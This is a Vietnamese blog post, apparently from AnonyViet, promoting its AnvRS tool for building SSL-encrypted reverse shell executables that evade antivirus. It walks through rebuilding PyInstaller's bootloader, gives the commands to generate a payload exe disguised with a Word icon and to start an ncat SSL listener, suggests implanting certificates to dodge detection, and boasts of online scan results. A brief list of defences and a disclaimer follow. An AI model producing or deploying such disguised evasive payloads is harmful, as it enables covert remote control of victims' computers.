Trong thời đại Internet, việc bảo mật thông tin và hệ thống trước những mối nguy hiểm trở nên cần thiết hơn bao giờ hết. Cùng với sự ra đời của những công cụ bảo mật và diệt virus, các hacker cũng không ngừng tìm cách để lách qua rào cản bảo mật và tấn công các hệ thống mục tiêu. Một trong những kỹ thuật phổ biến trong việc xâm nhập hệ thống mạng mà các hacker sử dụng để tiếp cận và kiểm soát các hệ thống từ xa là “Reverse Shell”. Đây là một khái niệm đã trở nên không còn xa lạ với cộng đồng an ninh mạng. Các biện pháp bảo mật ngày càng tinh vi và chặt chẽ hơn, việc tìm kiếm cách để xâm nhập vào hệ thống một cách ẩn danh và tránh được sự theo dõi trở nên thách thức hơn bao giờ hết. Trong tình huống như vậy, việc sử dụng Reverse Shell thông qua SSL đã trở thành một trong những phương pháp ưa thích của các hacker và người nghiên cứu bảo mật. Trong bài viết này, mình muốn giới thiệu đến cho các bạn một công cụ mang tên AnvRS. Đây là một công cụ Reverse Shell được phát triển bởi Anonyviet với khả năng bypass các phần mềm chống virus thông qua việc sử dụng kết nối SSL. Trước khi vào vấn đề chính, mình sẽ nói ngắn gọn về khái niệm của Reverse Shell và SSL
| Tham gia kênh Telegram của AnonyViet 👉 Link 👈 |
Lưu ý: Công cụ này chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Vui lòng không sử dụng vào mục đích xấu. Anonyviet sẽ không chịu toàn bộ trách nhiệm về các hành vi bất hợp pháp !
Reverse Shell và SSL là gì ?
- Reverse Shell: Là một kỹ thuật phổ biến đối với việc xâm nhập hệ thống mạng, nơi các máy tính bị xâm nhập sẽ tạo ra một kết nối với máy tính mục tiêu của kẻ tấn công. Điều này cho phép kẻ tấn công tiến hành các hoạt động xâm nhập từ xa, bao gồm cài đặt mã độc, đánh cắp dữ liệu, sửa đổi cấu hình hệ thống, v.v. Kỹ thuật này chủ yếu được sử dụng nhằm khai thác độ tin cậy của hệ thống mạng và tạo ra một cửa sổ ảo nhằm thực hiện các hoạt động xâm nhập
- SSL (Secure Sockets Layer): Là giao thức bảo mật được thiết kế nhằm mã hoá dữ liệu truyền giữa máy tính người dùng và máy chủ, ngăn người thứ ba nào lấy được dữ liệu. SSL tạo ra một kênh bảo mật giữa hai bên nhằm bảo vệ sự riêng tư và toàn vẹn của dữ liệu
Như vậy, khi phối hợp giữa Reverse Shell và SSL trong một cuộc tấn công, cho phép hacker tạo ra một kết nối từ xa với máy tính mục tiêu qua một kênh bảo mật bằng SSL. Điều này làm cho việc phát hiện và ngăn chặn các biện pháp kiểm soát an ninh trở nên khó hơn, bởi vì dữ liệu được lưu trữ và gửi qua mạng một cách an toàn. Kết quả là, hacker sẽ thực hiện các cuộc tấn công reverse shell khó bị phát hiện hơn và đòi hỏi những giải pháp bảo mật phức tạp để ngăn chặn cuộc tấn công reverse shell này
Cách cài đặt và sử dụng công cụ AnvRS – Reverse Shell Bypass Antivirus
Để sử dụng công cụ AnvRS trước tiên mình yêu cầu bạn cần phải có Python 3.10 trở lên, Microsoft Visual C++ Build Tools ( Cách cài đặt Microsoft Visual C++ Build Tools ) và Ncat. Sau khi bạn đã cài đặt xong những thứ trên bây giờ bạn lên trang chủ GitHub của Pyinstaller . Nếu máy bạn nào đã cài Pyinstaller từ trước thì chạy lệnh python -m pip uninstall pyinstallervà cài đặt phiên bản mới nhất, hiện tại phiên bản mới nhất của Pyinstaller là 5.13.1
Sau khi cài đặt xong, các bạn hãy giải nén nó ra và mở CMD trỏ đến thư mục của Pyinstaller vừa giải nén, rồi chạy lệnh sau:
cd bootloader
python ./waf all
Khi lệnh được thực hiện hoàn tất, tiếp đến bạn hãy mở CMD với quyền Admin và trỏ đến thư mục Pyinstaller vừa giải nén, rồi chạy lệnh sau:
python -m pip install .
Khi lệnh chạy hoàn thành, bây giờ bạn đã có thể sử dụng được công cụ AnvRS. Để sử dụng công cụ này việc đầu tiên bạn hãy tạo 1 file .py với tên tùy thích, mình sẽ đặt là AnvRS.py sau đó copy mã nguồn của tool tại đây. Để tạo ra 1 payload cho cuộc tấn công Reverse Shell kết hợp với SSL chúng ta sẽ thực hiện với cú pháp lệnh sau:
python AnvRS.py -i <YourIpAddress> -p <YourPort> -o <YourName>.exe
Ví dụ:
python AnvRS.py -i 127.0.0.1 -p 6789 -o ReverseShell.exe
Ngoài ra, nếu bạn muốn thêm icon cho file exe thì thực hiện cú pháp lệnh sau:
python AnvRS.py -i 127.0.0.1 -p 6789 --icon <PathToIconFile>.ico -o ReverseShell.exe
Ví dụ:
python AnvRS.py -i 127.0.0.1 -p 6789 --icon C:\Users\test\Downloads\word.ico -o ReverseShell.exe
Sau khi công cụ biên dịch thành công payload reverse shell, bạn cũng có thể cấy thêm chứng chỉ để tăng khả năng Bypass Antivirus. Nếu bạn nào chưa biết kĩ thuật này thì hãy đọc bài viết Cấy Certificate từ App khác vào Virus để Bypass AV
Để chuẩn bị cuộc tấn công chúng ta sẽ sử dụng công cụ ncat với cú pháp lệnh như sau:
ncat --ssl -lnvp <YourPort> -4 <YourIpAddress>
Ví dụ:
ncat --ssl -lnvp 6789 -4 127.0.0.1
Mình sẽ Demo tấn công Reverse Shell với công cụ AnvRS qua Video này:
Và đây là kết quả của 3 trang web quét virus online:
Metadefender: https://metadefender.opswat.com/results/file/bzIzMDgyNzNNX2MzX2tWTkpXdFFhTWhPQTc/regular/multiscan
virusscan.jotti.org: https://virusscan.jotti.org/en-US/filescanjob/0eziakqngw
Chà chà ! Có vẻ Anonyviet đã tạo ra một “quái vật Reverse Shell” !
AnvRS – một công cụ mạnh mẽ dành cho việc tạo ra các reverse shell có khả năng bypass antivirus. Nếu bạn là một chuyên gia bảo mật, hay là Pentester thì đây là một công cụ đáng để nghiên cứu và học tập. Đừng quên luôn duy trì tinh thần học hỏi và cùng nhau xây dựng một cộng đồng an toàn và bảo mật trên không gian số ngày nay nhé ! Sau đây là một số cách phòng chống
Cách phòng chống cuộc tấn công sử dụng kỹ thuật Reverse Shell kết hợp với SSL
- Firewall và ACLs: Thiết lập tường lửa (firewall) và danh sách kiểm soát truy cập (Access Control Lists – ACLs) để kiểm soát và giới hạn quyền truy cập vào hệ thống từ bên ngoài. Chặn các kết nối không cần thiết và chỉ cho phép các kết nối đến từ các nguồn đáng tin cậy
- Kiểm tra và theo dõi lưu lượng mạng: Theo dõi lưu lượng mạng và kiểm tra các kết nối đang diễn ra. Phát hiện sự xuất hiện của các kết nối lạ và không mong muốn có thể giúp bạn ngăn chặn các cuộc tấn công
- Cập nhật hệ thống và ứng dụng: Đảm bảo rằng hệ thống và các ứng dụng của bạn luôn được cập nhật lên phiên bản mới nhất, bao gồm cả các bản vá bảo mật. Điều này giúp giảm thiểu các lỗ hổng bảo mật mà kẻ tấn công có thể tận dụng
- Phần mềm chống virus và phát hiện xâm nhập: Sử dụng phần mềm chống virus và phần mềm phát hiện xâm nhập để kiểm tra và ngăn chặn các hoạt động độc hại. Cập nhật và cấu hình một cách thường xuyên
- Giám sát hoạt động không thường xuyên: Theo dõi hoạt động của hệ thống để phát hiện các biểu hiện của cuộc tấn công hoặc hoạt động bất thường
- Phân tích lưu lượng mạng: Sử dụng các công cụ phân tích lưu lượng mạng để xác định các mẫu không bình thường và hoạt động xâm nhập
- Quản lý quyền truy cập: Hạn chế quyền truy cập của người dùng và ứng dụng chỉ vào những gì cần thiết. Điều này giảm thiểu khả năng kẻ tấn công lợi dụng quyền truy cập để thực hiện các cuộc tấn công
- Xác thực và ủy quyền: Áp dụng các biện pháp xác thực mạnh mẽ và quản lý ủy quyền cẩn thận để đảm bảo rằng chỉ các người dùng có quyền truy cập thực sự có thể tham gia vào hệ thống
Và đó là những cách phòng chống mà mình biết, nếu bạn nào có cách phòng chống thì hãy comment dưới bài viết nhé. Và mình cũng mong rằng, trong tương lai, các phần mềm chống virus và hệ thống bảo mật sẽ tiếp tục được phát triển để ngày càng hiệu quả hơn trong việc phát hiện và ngăn chặn các mối đe dọa. Việc nắm vững kiến thức về cách tấn công và cách phòng ngừa là vô cùng quan trọng để đảm bảo an toàn cho dữ liệu và hệ thống. Chúng ta cũng nên nhớ rằng việc tìm hiểu về các kỹ thuật phòng ngừa và bảo vệ chống lại các kỹ thuật tấn công là quan trọng. Với cách này chúng ta mới có thể duy trì môi trường an toàn và đáng tin cậy trong thời đại Internet ngày nay. Hãy tập trung vào việc sử dụng kiến thức của mình một cách đúng đắn, đảm bảo rằng công nghệ luôn phục vụ cho lợi ích của xã hội và kỹ thuật an ninh mạng đóng góp vào việc bảo vệ mọi người khỏi cuộc tấn công Reverse Shell và các cuộc nguy hiểm khác nữa.
